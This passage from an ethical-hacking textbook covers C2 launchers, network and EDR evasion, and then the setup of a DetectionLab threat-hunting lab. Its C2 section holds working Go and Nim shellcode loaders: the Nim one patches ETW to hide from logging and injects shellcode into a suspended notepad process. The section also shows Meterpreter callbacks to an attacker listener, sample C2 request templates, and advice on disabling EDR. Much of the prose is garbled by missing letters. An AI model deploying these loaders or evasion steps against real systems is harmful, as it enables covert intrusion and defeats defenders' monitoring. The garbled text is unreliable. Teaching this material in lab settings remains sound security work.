              Payload size: 200262 bytes
              Final size of csharp file: 1014695 bytes

                When we run he shell file, we see he oupu from msfvenom prined o he screen,
              nd our resuling cshrp_dropper64.exe file is in /mp. We cn ccess i from he
              Windows ox vi our shre. Wih Mesploi sill running, wiing for connecions, le’s
              run h inry:
              PS C:\> cd \\10.0.0.40\ghh
              PS Microsoft.PowerShell.Core\FileSystem::\\10.0.0.40\ghh> .\csharp_dropper64.exe

                  In he Mesploi console on Kli, we should see our new shell come in:
              [*] Meterpreter session 4 opened (10.0.0.40:4444 -> 10.0.0.20:56949)
              at 2021-09-25 05:09:29 +0000
              msf6 exploit(multi/handler) > sessions -i 4
              [*] Starting interaction with 4...

                 To vlide we re running s he new process, we cn use he getpid commnd o
              ge he curren process ID nd hen use ps -S <processname> o vlide i mches our
              process ID:
              meterpreter > getpid
              Current pid: 4272
              meterpreter > ps -S csharp_dropper64.exe
              Filtering on 'csharp_dropper64.exe'
              Process List
              ============
               PID   PPID Name                    Arch Session         User          Path
               ---   ---- ----                    ---- -------         ----          ----
               4272 4016 csharp_dropper64.exe x64      2               GHH\target

                 We cn see h our code is running in our C# luncher nd we hve he iliy o
              lunch commnds in Mesploi. This could hve een ny pylod we wn, such s 
              Covenn pylod or oher ypes of C2 pylods.

              Creating Go Launchers
              Go is growing in populriy ecuse of is cross-plform cpiliies. Go cn e com-
              piled for moile nd rdiionl compuer plforms, including iOS, Linux, Windows,
              mcOS, Solris, nd even z/OS. Becuse Go is compiled, i’s  good wy of inroducing
              lunchers h rdiionl signures migh no cch. Go cn use Windows nd oher
              opering sysems’ uil-in lirries nd consrucs o execue shellcode wihou follow-
              ing he rdiionl perns h signure-sed deecions my e looking for.
                                                                             Chapter 7: Command and Control (C2)
   One of he GiHu projecs h hs good Windows exmples is Russel Vn Tuyl’s
go-shellcode reposiory (hps://gihu.com/Ne0nd0g/go-shellcode), which hs differen
execuion perns wrien in Go. These re good references for mking your own Go
luncher s well s for poring hese perns o oher lnguges.

Lab 7-5: Compiling and Testing Go Launchers

                                                                                                                   PART II
Windows inries in Go cn e cross-compiled from Kli Linux using he mingw pck-
ges. Wih he golng nd mingw pckges inslled, ll we hve o do is specify he rchi-
ecure nd OS, nd Go will hndle he mjoriy of he uild insrucions for us. For his
l, we will coninue o use our Meerpreer lisener, nd we will use he uild_go.sh nd
go.emple files in he shells direcory. The Go code for his l uses  slighly differen
echnique hn he ls l. Insed of hreds, we use  fier o lunch our code. A fiber is
similr o  hred. I is n execuion srem sepre from he min porion of he code.
However, hreds re scheduled y he pplicion. Two hreds don’ hve o do nyhing
specil o oh run  he sme ime. Fiers require  scheduler o hndle he mulisk-
ing. As  resul, when we run our fier, i will keep running unil i exis or unil our code
relinquishes conrol o he res of he pplicion.

             NOTE Fibers and threads have more differences. If you want to know
             more about how threads and fibers are related and how to use them in
             applications, see Dale Weiler’s great reference at https://graphitemaster
             .github.io/fibers/.

   Becuse our shellcode doesn’ know i’s in  fier, he end resul is h our code will
hng unil our shellcode exis. The Go code will look similr o wh we did in C#
ecuse i’s lso using Windows kernel32.dll nd ndll.dll lirries. This code is modi-
fied from he ired.em fier exmples s well s he code from he Ne0nd0g reposiory
menioned erlier.
   For his exmple, we re going o e encoding our shellcode in se64, which les us
esily pu i ino Go synx:
shellcode, err := base64.StdEncoding.DecodeString(sc)

Here, we re using he se64 lirry nd decoding he sring we hve se wih our shell-
code, sc, nd sving i in he shellcode vrile. If ny error codes re reurned, hey re
sved ino he err vrile. The := operor is for creing nd ssigning vriles  he
sme ime, where = is used o ssign  vlue o  vrile h hs lredy een creed:
_, _, err = ❶ConvertThreadToFiber.Call()
addr, _, err:= ❷VirtualAlloc.Call(0, uintptr(len(shellcode)),
 _MEM_COMMIT|_MEM_RESERVE, _PAGE_RWX)
_, _, err = ❸RtlCopyMemory.Call(addr,
            (uintptr)(unsafe.Pointer(&shellcode[0])),
uintptr(len(shellcode)))
fiber, _, err:= ❹CreateFiber.Call(0, addr, 0)
❺SwitchToFiber.Call(fiber)
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 To execue our shellcode, we need o follow  few seps. The firs sep is o conver
              our min hred ino  fier. We do his wih he ConvertThreadToFiber funcion ❶,
              which, when specified wih no opions, kes he curren hred nd convers i o  fier.
              We hve o do his ecuse only fiers cn cree ddiionl fiers.
                 The nex sep is o lloce memory for our shellcode wih he VirtualAlloc funcion ❷.
              Here, we re creing he memory s Red/Wrie/Execue in one sep. This my e seen
              s mlicious o some defense producs, so we could lwys mke i wrile o copy he
              shellcode in nd hen remove he wrie is using VirtualProtect o mke i seem less
              suspicious. Now h we hve he memory, we cn copy he shellcode ino i wih he
              RtlCopyMemory cll ❸. One hing o noe ou Go is h i ries o proec you from
              cerin ype conversions h my e dngerous, so using he unsfe lirry will ypss
              hose proecions.
                 The nex sep is o cree  new fier for scheduling wih he CreateFiber funcion ❹.
              Noice h, for his cll, we re creing  new fier poining o he memory locion of
              our shellcode nd i is reurning he ddress of he new fier. Wih h ddress we cn
              se execuion o he new fier wih he SwitchToFiber cll ❺. From here, our code will
              execue unil he fier finishes or he code yields execuion ck o he min fier.
                 Now h we undersnd wh our code is doing, we cn run he uild_go.sh scrip
              from he shells direcory in our hosed Kli. This will cree  /mp/CreeFier.exe file
              h we cn lunch from our Windows ox. The uild line for he Go inry iself speci-
              fies he rchiecure nd OS on he commnd line wih environmen vrile h cn e
              se in  user’s environmen or on he commnd line iself:
              GOOS=windows GOARCH=amd64 go build -o /tmp/CreateFiber.exe createFiber.go

                  Now wih our msfconsole lisener running, we cn run he code on he Windows ox:
              Microsoft.PowerShell.Core\FileSystem::\\10.0.0.40\ghh> .\CreateFiber.exe

                 In our Linux Meerpreer session, we should now see  new session h we cn iner-
              c wih nd use o execue commnds:
              [*] Meterpreter session 5 opened (10.0.0.40:4444 -> 10.0.0.20:58764)
              at 2021-09-25 08:07:59 +0000
              msf6 exploit(multi/handler) > sessions -i 5
              [*] Starting interaction with 5...
              meterpreter > getuid
              Server username: GHH\target

                 Our inry on he Windows sysem will coninue o execue unil we exi he Meer-
              preer session, nd hen i should exi. You cn invesige he ddiionl exmples in he
              go-shellcode direcory on your Kli insnce, nd you cn ry o modify oher exmples
              o run on he rge ox s well.

              Creating Nim Launchers
              Nim is noher compiled lnguge h hs suppor for muliple opering sysems nd
              kes some of he populr prs of Pyhon nd oher lnguges o mke  more user-
              friendly lnguge h compiles o C, C++, Ojecive-C, nd JvScrip. Becuse of his,
                                                                              Chapter 7: Command and Control (C2)
he code cn e compiled o one of he inermedie lnguges nd included in oher
projecs s well s e compiled o inries iself. The flexiiliy of Nim is pr of is popu-
lriy, long wih he fc h he signures of he inries will e differen enough o
ge ps mny rdiionl AV deecions.
   There ren’  on of reposiories ou here using Nim righ now, u i hs goen
enion from oh hre cors nd ehicl hckers. One of he individuls who hs
done gre reserch on offensive Nim is Mrcello Slvi, known online s By3l33der.
His Offensive Nim reposiory  hps://gihu.com/y3l33d3r/OffensiveNim hs

                                                                                                                    PART II
smples of implemenions of muliple shellcode lunching nd evsion echniques.

Lab 7-6: Compiling and Testing Nim Launchers

For he Nim l, we re going o e using he sme seup s he previous wo ls, wih
our Mesploi Meerpreer hndler lisening nd uilding our code on he Kli mchine.
To se up our modules for our Nim code, we need o insll  module. Nimle is he
module mnger for Nim, so from our shells direcory, we insll he winim module
using Nimle, like so:
└─$ nimble install winim
    Prompt: No local packages.json found, download it from internet? [y/N]
    Answer: y
Downloading Official package list
    Success Package list downloaded.
Downloading https://github.com/khchen/winim using git
  Verifying dependencies for winim@3.6.1
 Installing winim@3.6.1
   Success: winim installed successfully.

   The winim pckge conins he Windows modules nd definiions we need o lunch
our shellcode. I’s no inslled y deful, so we hve o insll i. Nex, we re going o
ke  quick look  our Nim code in he nim.emple file in he shells direcory. This
code is sed off of muliple OffensiveNim exmples y By3l33der. We re going o
elimine  lo of he error checking nd messging o preserve spce:
const patch: array[1, byte] = [byte 0xc3]
proc Patchntdll(): bool =
    var
        ntdll: LibHandle
        etwPointer: pointer
        origProtect: DWORD
        trash: DWORD
        disabled: bool = false
    ❶ntdll = loadLib("ntdll")
    ❷etwPointer = ntdll.symAddr("EtwEventWrite")
    ❸VirtualProtect(etwPointer, patch.len,
        PAGE_EXECUTE_READ_WRITE, addr origProtect)
    ❹copyMem(etwPointer, unsafeAddr patch, patch.len)
    ❺VirtualProtect(etwPointer, patch.len, origProtect, addr trash)

   The Patchntdll funcion overwries he EtwEventWrite funcion’s funcionliy
wih  reurn code so h i won’ execue ny code inside. The EtwEventWrite func-
ion logs he Even Trcing for Windows (ETW) evens, so his will sop ny of hem
Gray Hat Hacking: The Ethical Hacker’s Handbook
              from eing wrien ou, hus hiding our code from ny insrumenion h is using
              i. In order o do his, we sr y geing informion ou he funcion so we know
              wh we need o overwrie. The loadLib funcion ❶ lods he ndll.dll lirry ino our
              code. The symAddr funcion ❷ ges he ddress of he EtwEventWrite funcion. The
              VirtualProtect funcion ❸ ses he memory locion we re overwriing o Red/Wrie/
              Execue so we cn ❹ pply our overwrien yes o h memory. Finlly, we resore he
              originl proecion mode o he memory h ws sved ino he origProtect vrile
              using he VirtualProtect funcion ❺.
                  Once we hve disled ETW, we need o injec our shellcode. To do his, we will use
              he injectCreateRemoteThread funcion o injec our shellcode ino  new process:
              proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
                  ❶let tProcess = startProcess("notepad.exe")
                  tProcess.suspend()
                  ❷let pHandle = OpenProcess(PROCESS_ALL_ACCESS,false,
                      cast[DWORD](tProcess.processID))
                  let rPtr = VirtualAllocEx(pHandle, NULL, cast[SIZE_T](shellcode.len),
                      MEM_COMMIT, PAGE_EXECUTE_READ_WRITE )
                  var bytesWritten: SIZE_T
                  ❸let wSuccess = WriteProcessMemory(pHandle, rPtr, unsafeAddr shellcode,
                      cast[SIZE_T](shellcode.len),addr bytesWritten )
                  var origProtect: DWORD
                  ❹VirtualProtect(rPtr, cast[SIZE_T](shellcode.len),
                      PAGE_EXECUTE_READ, addr origProtect)
                  ❺let tHandle = CreateRemoteThread(pHandle, NULL,0,
                      cast[LPTHREAD_START_ROUTINE](rPtr), NULL, 0, NULL )

                  Some of his code we’ve seen efore, nd he pern looks fmilir. For his exmple,
              we re lunching  new process ❶ (in his cse, noepd.exe) where we will injec our
              code. We hve o suspend he process so h i won’ e visile nd won’ give he user
              conrol. Insed, we’ll open our process ❷ so h we cn mnipule i nd wrie our
              shellcode ❸ ino he process. We rese ❹ he proecion seings on he memory so h
              i won’ look srnge nd hen cree ❺  hred in he process. The hred will coninue
              o run, nd our shellcode will execue while he regulr funcionliy of he process will
              sill e suspended nd no visile o he user.
                  Finlly, we need o ie his informion ogeher. We do his in he equivlen of he
              min funcion for Nim:
              when isMainModule:
                  var success = Patchntdll()
                  echo fmt"[*] ETW blocked by patch: {bool(success)}"
                  injectCreateRemoteThread(shellcode)

                 This sys h if we ren’ including his code s  lirry nd his is he min mod-
              ule of  projec, hen i will pch he DLL nd hen injec he shellcode. We cn uild
              he shellcode wih he build_nim.sh commnd. The /mp/nim_dropper64.exe inry
              should now e in /mp, nd when we run i on our Windows ox, we shouldn’ see ny
              oupu, u we should see  session come ck in Mesploi:
              PS Microsoft.PowerShell.Core\FileSystem::\\10.0.0.40\ghh> .\nim_dropper64.exe
              [*] Applying patch
              [*] ETW blocked by patch: true
                                                                          Chapter 7: Command and Control (C2)
[*] Target Process: 3128
[*] pHandle: 180
[*] WriteProcessMemory: true
    \-- bytes written: 200262
[*] tHandle: 144
[+] Injected

Network Evasion

                                                                                                                PART II
Wih C2 chnnel eslished, we need o e le o evde deecion on he nework.
There re wo conrol res we ypiclly need o evde. The firs is IDS/IPS, nd he
second is proxy deecion. Mos orgnizions don’ decryp TLS d inernlly, u hey
my decryp TLS d going ouside he orgnizion. Knowing his, we hve muliple
res where encrypion nd evsion cn e performed.

Encryption
Two ypes of encrypion re common for C2 evsion. The firs is TLS-sed evsion.
By using TLS, res h don’ use TLS inspecion will no e le o see inside he rf-
fic, so he only insigh ools will hve ino he rffic will e frequency of communic-
ion nd he desinions. When possile, using TLS encrypion will help proec he
inegriy of he C2 rffic nd hide he srucure nd conen of he communicions
from defenders.
    If here is ny quesion ou wheher TLS inspecion is presen, using encrypion
inside he C2 proocol iself is recommended. Depending on he communicion, no
ll of he conens my e cple of eing encryped (for exmple, for HTTP, he hed-
ers cn’ e encryped). However, he ody of he conen nd res like cookies cn e
encryped. Encryping his d mens h even if TLS is inerceped, he conens of
wh is eing sen ck nd forh in he C2 sysem re no immediely rnspren,
nd eing le o deermine wh cions re eing ken y he C2 sysem re hrder
o deermine.
    When picking encrypion, mke sure you choose well-known encrypion schemes nd
no somehing sic like XOR-sed encrypion, ecuse cerin encrypion schemes
like XOR cn e vulnerle o known plinex cks. Things like he hosnme lmos
lwys pper in he firs pr of  rnscion. By choosing  eer encrypion scheme,
such s AES or RC4, you ensure he d is much more secure nd mke i hrder o
mper wih or figure ou he rffic wihou hving our cul shellcode.

Alternate Protocols
In ddiion o encrypion, some proocols hve eer nlysis hn ohers. Proocols
like HTTP re well undersood nd hve mny hndlers h undersnd hem. Oher
proocols my hve differen inspecion crieri, nd mixing proocols for  single
C2 sysem my help furher confuse defenders. For insnce, DNS is noher common
proocol o use, s mny orgnizions don’ hve good monioring or nlyics for DNS.
However, DNS is incredily noisy, so i my e eer used for check-ins nd signling
hn for sending lrge mouns of d. Comining DNS wih noher proocol such
Gray Hat Hacking: The Ethical Hacker’s Handbook
              s Rel-Time Sreming Proocol (RTSP) or WeSockes will men h muliple d
              poins will hve o e nlyzed o ge  full picure of wh your C2 sysem is doing. By
              using profiles h use round-roin for hosnmes, we cn cuse defenders o lso hve
              o find ll of he hosnmes h  compromised sysem is using o undersnd he fre-
              quency nd volume of he rffic leving he orgnizion.
                 Picking proocols h nework devices my hve hndlers for h re well docu-
              mened will furher increse your chnces for success. Perimeer conrols migh only
              pss rffic h hey undersnd, so using  compleely cusom C2 proocol migh e
              locked ecuse here ren’ hndlers in he nework devices o del wih h specific
              ype of rffic.

              C2 Templates
              C2 sysems frequenly llow emples for communicion. Since HTTP is he mos
              common proocol for C2 communicion, i’s imporn o undersnd where es o
              plce d when creing emples for communicions. Temples se up he locions
              where d will e plced when sending nd receiving d wih he C2 sysem. For
              insnce, mny C2 sysems will llow  GET reques for check-ins nd rerieving
              commnds o run s well s POST requess for sending d ck. A smple GET reques
              migh look like his:
              GET /ping.php?id=<C2 ID> HTTP/1.1
              Host: c2.derp.pro
              User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
              Accept-Language: en-us
              Accept-Encoding: gzip, deflate
              Connection: Keep-Alive

              Here we see h he ID for he C2 server my e included in he URI line. This would
              e esy o see nd mch up he differen hoss involved. So while his simple formul
              is common, i would e eer o plce he vlues in  cookie. Cookies ren’ logged on
              ll proxies, nd hey ren’ he firs hing folks look  in repors nd herefore require
              ddiionl digging o see.
                  For sending d, mny people use POST requess ecuse he d is in he pylod.
              How h d is represened my ke some hough. A very sic profile migh look
              like his:
              POST /pong.php HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
              Host: www.derp.pro
              Content-Type: application/x-www-form-urlencoded
              Content-Length: <length>
              Accept-Language: en-us
              Accept-Encoding: gzip, deflate
              Connection: Keep-Alive

              ID=<client ID>&data=<base64 encoded data>
                                                                             Chapter 7: Command and Control (C2)
   While his is sic, mos of he criicl d is in he ody of he POST reques,
which mens i won’ likely e logged nywhere. Becuse i’s se64 encoded, i is esily
decoded y uomic ooling. Choosing  eer encoding scheme nd encryping he
d my mke i hrder o decode. Also, mching up he user gen o he user’s deful
rowser nd hen using similr heders will mke i look more norml.
   Becuse his emple is so simple, i is ovious h i is C2 rffic. However, if you
mde he GET nd POST requess look like hey were using  REST API or oher kind
of rel HTTP rffic, in ddiion o choosing eer heders nd  user-gen, you could

                                                                                                                   PART II
mke i lend in even eer. Overll, picking  relisic-looking profile nd hen using
he sme heders h  regulr user on  sysem use will give you  eer chnce of
voiding deecion.

EDR Evasion
Endpoin deecion nd response (EDR) is ecoming more common in corpore envi-
ronmens. EDR ypiclly looks  he ehvior of inries on he sysem y insru-
mening processes wih hooked APIs so h i cn wch differen ehviors nd ssess
wheher or no hey re risky. Differen producs hook APIs in differen wys, u hey
lso differ in every deploymen. The seings nd excepions h ech orgnizion hs
my e differen.
   In ddiion, he proecions for he EDR soluion iself my e differen. Mos EDR
soluions hve oh  deecion nd  locking mode. Depending on he se of he
EDR, your ess my or my no e locked, even hough hey re lering.

Killing EDR Products
Some EDR soluions cn e killed or disled. Ohers hve mper prevenion h will
preven he services from eing sopped nd deny permission for uninslling or killing
off services. This is somehing h is ypiclly pr of he configurion, so ech profile
in use for  produc my hve differen mper-proecion seings. Tesing o see if you
cn kill hese services my se off lers, u my lso e successful.
   In ddiion, mny of he newer echnologies re required o repor o he cloud for
monioring nd o fire lers. By seing up hos-sed firewll rules, dding enries o he
hoss file, modifying locl DNS enries, nd more, you cn disrup h communicion.
This disrupion will llow you o ry o find wys of disling he ool wihou i repor-
ing your cions o is monioring service. In ddiion, some producs cn hve heir
drivers removed from he Windows environmen, furher limiing visiiliy.
   Regrdless of wh EDR soluion you re deling wih, i’s es o profile he mchine
you’re on efore you perform ny risky ehvior. Becuse hese producs re chnging ll
he ime, if you re unfmilir wih  sysem, do reserch on h sysem o deermine log-
ging ypsses, disling mehods, nd uninsll opions efore you sr pos-exploiion
civiies on he sysem.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Bypassing Hooks
              Mos EDR producs re le o undersnd wh is hppening in  process vi hooks ino
              differen APIs. Cornelis de Pl wroe n ricle ou how his works nd some wys o
              ypss hese hooks in his log ricle “Red Tem Tcics: Comining Direc Sysem Clls
              nd sRDI o ypss AV/EDR” (hps://ouflnk.nl/log/2019/06/19/red-em-cics-
              comining-direc-sysem-clls-nd-srdi-o-ypss-v-edr/). This mehod will override
              he hooks in  process in order o execue sysem clls direcly wihou hiing he ddi-
              ionl funcions.
                 If you re uilding your own ools, ired.em lso hs informion ou how o
              re-mp secions of inries h my e hooked ino memory direcly from disk. Their
              ricle “Full DLL Unhooking wih C++” (hps://www.ired.em/offensive-securiy/
              defense-evsion/how-o-unhook--dll-using-c++) shows some of he sic C++ ech-
              niques h could e dded o cusom lunchers o void he hooks.
                 Anoher helpful ool is ShrpBlock (hps://gihu.com/CCo/ShrpBlock), which
              will lock injecion of EDR insrumenion ino  process s well s pch ou ETW,
              AMSI, nd oher insrumenion h migh give wy your code. As echnologies
              chnge, hese syles of cks will ecome more prevlen, nd he EDR vendors will
              look o com hem. Twier, logs, nd conference presenions will help you sy
              hed of he curve so h you cn e wre of he les echniques for he EDR producs
              you come cross.

              Summary
              Commnd nd conrol nd shellcode lunchers re wo key ools red ems nd ehicl
              hckers will need o hve  grsp of. C2 producs le us conrol  hos remoely s well
              s perform pos-exploiion sks more esily. The lunchers help us ge our C2 gens
              on o sysems. Undersnding his s well s how o uild srong nework evsion pro-
              files nd ypss EDR nd AV on  sysem cn help us ge our ooling ono sysems nd
              keep i from eing deeced nd miiged. The longer we re on  sysem wihou eing
              deeced, he greer he chnce our sks will e successful.

              For Further Reading
              Metasploit GitHub gihu.com/rpid7/mesploi-frmework
              Metasploitable sourceforge.ne/projecs/mesploile/
              Metasploit Unleashed www.offensive-securiy.com/mesploi-unleshed/
              PowerShell Empire gihu.com/BC-SECURITY/Empire.
              Covenant GitHub gihu.com/cor/Covenn
              SharpSploit gihu.com/cor/ShrpSploi
              Go shellcode repository gihu.com/Ne0nd0g/go-shellcode
              Offensive Nim gihu.com/y3l33d3r/OffensiveNim
                                                                   Chapter 7: Command and Control (C2)
Combining direct system calls and SDRI to bypass AV and EDR ouflnk.nl/
log/2019/06/19/red-em-cics-comining-direc-sysem-clls-nd-srdi-o-ypss-
v-edr/
How to unhook a DLL using C++ www.ired.em/offensive-securiy/defense-evsion/
how-o-unhook--dll-using-c++
SharpBlock gihu.com/CCo/ShrpBlock
Red team techniques for evading, bypassing, and disabling MS ATP and ATA www

                                                                                                         PART II
.lckh.com/docs/eu-17/merils/eu-17-Thompson-Red-Tem-Techniques-For-
Evding-Bypssing-And-Disling-MS-Advnced-Thre-Proecion-And-Advnced-
Thre-Anlyics.pdf
This page intentionally left blank
  Building a
  Threat Hunting Lab
                                                                            CHAPTER

                                                                                             8
  In this chapter, we cover the following topics:
      • Threat hunting and labs
      • Basic threat hunting lab: DetectionLab
      • Extending your lab with HELK

Wha is a ha huig lab? Tha huig will b covd i h x chap, bu
ssially i is h sysmaic huig of has ha a o ohwis appa i h
wok hough h us of chologis such as SIEM, IDS, IPS, ad so o. I od o
la his vial skill s, you will d a saf viom i which o play—a lab vi-
om wih all h quid ools isalld, i a auomad dploym, ha may b
s up ad o dow quickly. To his d, w will xplo h las ad bs opios fo
you ha huig lab.

Threat Hunting and Labs
Tha huig is a maual pocss ha quis you o la abou pocsss, ha
acos, ad TTPs (s Chap 1). Mo impoaly, pacic is quid o dvlop you
huig skills. I his chap, w will focus o sig up you lab.

Options of Threat Hunting Labs
Sval mhods a availabl fo sig up you ow ha huig lab. Fo xampl,
you could maually s up vyhig you d fo ha huig, icludig h domai
svs, woksaios, ad scuiy ools. A i book could b dvod o his opic,
so o kp h discussio bif, w will la o usig auomad mhods. Ev so, as
you will s, w sill d o oll up ou slvs ad cusomiz h auomad labs. Wh
i coms o auomad ha huig labs, wo pojcs a havily suppod ad woh
lookig a: DcioLab ad HELK.

Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Fis, DcioLab,1 cad by Chis Log (clog), is wll suppod by sval
              dvlops ad offs h wids slcio of ools ad auomad opios fo isallaio
              o a local hos, via sval opaig sysms, ad i h cloud. Scod, h HELK2 poj-
              c, alog wih associad pojcs such as Modo,3 OSSEM,4 ad Th ThaHu-
              Playbook,5 is wll suppod by h Rodiguz bohs (Robo ad Jos) ad may
              oh dvlops (Op Tha Rsach Fog)6 ad is woh ou cosidaio ad us.
              Th mai diffc bw hs wo pojcs is ha DcioLab is a compl lab
              viom, wih all h quid ools, bu i’s focusd o Spluk. HELK, o h oh
              had, is o a compl lab viom. Isad, i is a aalyic plafom (basd o
              Elasicsach7 ad ools) ha may augm you xisig lab viom. Also, b su
              o chck ou Blacksmih ad SimuLad i h “Fo Fuh Radig” scio. Boh po-
              vid cloud-oly lab vioms. Howv, if you a lookig fo h mos flxibiliy,
              ad h opio o isall locally, you should go wih DcioLab. Fially, a umb of
              oh auomad labs a woh mioig, bu hy a lss suppod, so hy could
              hav issus ha a o addssd. Thos oh pojcs a lisd i h “Fo Fuh
              Radig” scio of his chap.

              Method for the Rest of this Chapter
              I his chap, w will g h bs of boh pojcs miod pviously. W will
              sa wih DcioLab, akig advaag of is xsiv lab viom, alog wih
              is wid isallaio ad hosig opios, ad h w will augm DcioLab by
              isallig HELK ad Modo o op of i, bigig fowad h wid ag of xpic
              ha coms wih hos ools.

              Basic Threat Hunting Lab: DetectionLab
              Fis, w will build a basic ha huig lab, ih o you local hos o i h cloud.

              Prerequisites
              Agai, i his chap, w a goig o us h vabl DcioLab by Chis Log
              (clog), augmd wih HELK ad Modo by Robo Rodiguz (Cyb3Wad0g).
              Th pquisis a as follows:

                    • Widows, Liux, macOS, Azu, ad AWS a all suppod.
                    • 55GB+ of f disk spac.
                    • 16GB+ of RAM is highly commdd.
                    • Vaga 2.2.9+.
                    • Pack 1.6.0+ (oly quid if you’ buildig you ow boxs).
                    • ViualBox 6.0+ (old vsios may wok bu a o sd).
                    • A gisd vsio of VMwa (oly gisd vsios wok). Addiioal
                      sofwa is quid; s h DcioLab si fo fuh ifomaio.

Lab 8-1: Install the Lab on Your Host

I his fis lab, w will isall h ha huig lab o ou ow hos. I his cas, w
will us Widows, bu as you ca s fom h pquisis, all opaig sysms a
suppod. If you don’t have the necessary resources available or don’t want to install the lab
on your host but in the cloud instead, skip the rest of this lab.
   Fis, fom you hos, dowload ad isall ViualBox,8 which is usd wih Vaga

                                                                                                                       PART II
o lauch h imags.

             NOTE Disable Hypervisor if you are running VirtualBox on a Windows 10
             host. It is on by default and will prevent VirtualBox from running correctly.
             For more information, see https://docs.microsoft.com/en-us/troubleshoot/
             windows-client/application-management/virtualization-apps-not-work-
             with-hyper-v.

   Th dfaul sigs wihi ViualBox will do. Th is o d o u ViualBox
af isallaio, h Vaga scips will do ha fo us.
   Nx, if you a o Widows (lik m) ad hav o isalld gi y, dowload ad
isall i ow.9 Th, lauch gi bash o wok wih gi ad chag o h c:/ oo dicoy:
$cd /c/

  Visi h GiHub si fo DcioLab (hps://gihub.com/clog/DcioLab).
W will walk hough h isall, bu ak a mom o ad h dicios h ad
dowload h fils (fom ou gi bash pomp):
$git clone https://github.com/clong/DetectionLab.git
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Now, dowload ad isall Vaga fo you hos.10 You hos will d o b bood
              af h isall. Tha is good, as you wo’ wa ay oh applicaios uig wh
              you lauch h labs bcaus you will d vy bi of you 16GB of RAM.

                                 NOTE If you don’t have 16GB of RAM, or if you have some large applications
                                 already running, these labs won’t work. VirtualBox is unstable when you fully
                                 use the RAM of a system. If that happens to you, you will need to build your
                                 labs in the cloud (see Lab 8-2).

                Eih wihi you gi bash o PowShll, chag o h DcioLab/Vaga fold
              ad h di h Vagafil (o add mo RAM o h logg fo HELK) as follows. Th
              bold lis i h cod show you wh o look i h cofig fil; oh bold lis show
              you wha o chag.
              …
                     cfg.vm.provider "virtualbox" do |vb, override|
                       vb.gui = true
                       vb.name = "logger"
                       vb.customize ["modifyvm", :id, "--memory", 8192]
              …
                     cfg.vm.provider "virtualbox" do |vb, override|
                       vb.gui = true
                       vb.name = "dc.windomain.local"
                       vb.default_nic_type = "82545EM"
                       vb.customize ["modifyvm", :id, "--memory", 2048]
              …
                     cfg.vm.provider "virtualbox" do |vb, override|
                       vb.gui = true
                       vb.name = "wef.windomain.local"
                       vb.default_nic_type = "82545EM"
                       vb.customize ["modifyvm", :id, "--memory", 1024]
              …
                     cfg.vm.provider "virtualbox" do |vb, override|
                       vb.gui = true
                       vb.name = "win10.windomain.local"
                       vb.default_nic_type = "82545EM"
                       vb.customize ["modifyvm", :id, "--memory", 2048]
                       vb.customize ["modifyvm", :id, "--graphicscontroller", "vboxsvga"]

                Nx, ppa h Vaga scips, as follows, usig PowShll by igh-clickig
              PowShll ad slcig Ru As Admiisao:
              PS C:\Windows\system32> cd C:\DetectionLab\Vagrant
              PS C:\DetectionLab\Vagrant> .\prepare.ps1
              [+] Beginning pre-build checks for DetectionLab
              [+] Checking for necessary tools in PATH...
                [-] Packer was not found in your PATH.
                [-] This is only needed if you plan to build your own boxes, otherwise you
              can ignore this message.
                [ √ ] Your version of Vagrant ( 2.2.16) is supported
              …truncated for brevity…
              [+] Enumerating available providers...
              [+] Available Providers:
                [*] virtualbox
             NOTE If you get a script permission or execution error on this command,
             you will need to run “set-executionpolicy unrestricted,” then select option
             “A” from an administrator PowerShell. You will want to re-enable that policy
             when you are done here (set-executionpolicy restricted).

   Now o g sad buildig DcioLab, simply chag o h c:\DcioLab\
Vaga dicoy ad u vagrant up, as show x. I will ak abou wo hous o

                                                                                                                      PART II
load all of h viual machis, bu you oly hav o do his oc.
PS C:\DetectionLab\Vagrant> vagrant up
…truncated for brevity…

   Af h PowShll scip compls, chck ha all sysms a uig as idd:
PS C:\DetectionLab\Vagrant> .\post_build_checks.ps1
[*] Verifying that Splunk is reachable...
  [ √ ] Splunk is running and reachable!

[*] Verifying that Fleet is reachable...
  [ √ ] Fleet is running and reachable!

[*] Verifying that Microsoft ATA is reachable...
  [ √ ] Microsoft ATA is running and reachable!

[*] Verifying that Velociraptor is reachable...
  [ √ ] Velociraptor is running and reachable!

[*] Verifying that Guacamole is reachable...
  [ √ ] Guacamole is running and reachable!

   If you u io ay issus alog h way, chck ou h oublshooig ad kow
issus pag.11

Lab 8-2: Install the Lab in the Cloud

If you do’ hav 16GB of RAM availabl, you will wa o us h cloud. Fo his lab,
w will us Azu. As a bous, h is a $200 cdi fo sigig up12 ha mus b usd
wihi fis 30 days, which is ply of im o kick h is ad s if you wa o us h
lab log m. If you pf o us AWS, howv, h DcioLab GiHub posioy
has asy isallaio isucios fo ha as wll.

             CAUTION It should go without saying that the cloud is not free, and if you
             use it beyond any credits you may have, you will incur substantial fees. The
             good news is that you can shut down your images when you don’t need
             them to save costs. You have been warned.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                To chag higs up, his im w will lauch ou cloud isacs fom a Mac hos.
              Agai, ay hos is suppod; you jus d o f o h DcioLab si fo oh
              opaig sysms. To u his lab o h cloud (Azu), fis isall Bw,13 Tafom,14
              Asibl,15 ad h Azu CLI ools:16
              % /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/
              install/HEAD/install.sh)"
              % brew install terraform
              % brew install ansible
              % brew install azure-cli

                  Dowload h souc cod fom h DcioLab GiHub posioy:
              % git clone https://github.com/clong/DetectionLab.git
              % cd DetectionLab/Azure/Terraform

                 Copy h xampl fvas fil ad di i o iclud you IP (whaismyip.com) ad you
              us fil locaio ifomaio:
              % c p t e r r a f o r m. t f v a r s . e x a mp l e   t e r r a f o r m. t f v a r s

                 Edi h fil wih you favoi dio. Agai, b su o upda h ip_whilis vai-
              abl, as wll as you public ad piva ky locaios, chagig “/hom/us” o h loca-
              io of h kyg oupu show. If you skip his sp, you will b lockd ou of h labs,
              as oly h IP fom h whilis may accss h labs.

                                  NOTE If in the future you change your IP, be sure to go to the Azure portal,
                                  search for “Network Security Groups” at the top, find your security group,
                                  and change your IP there on the inbound rules.

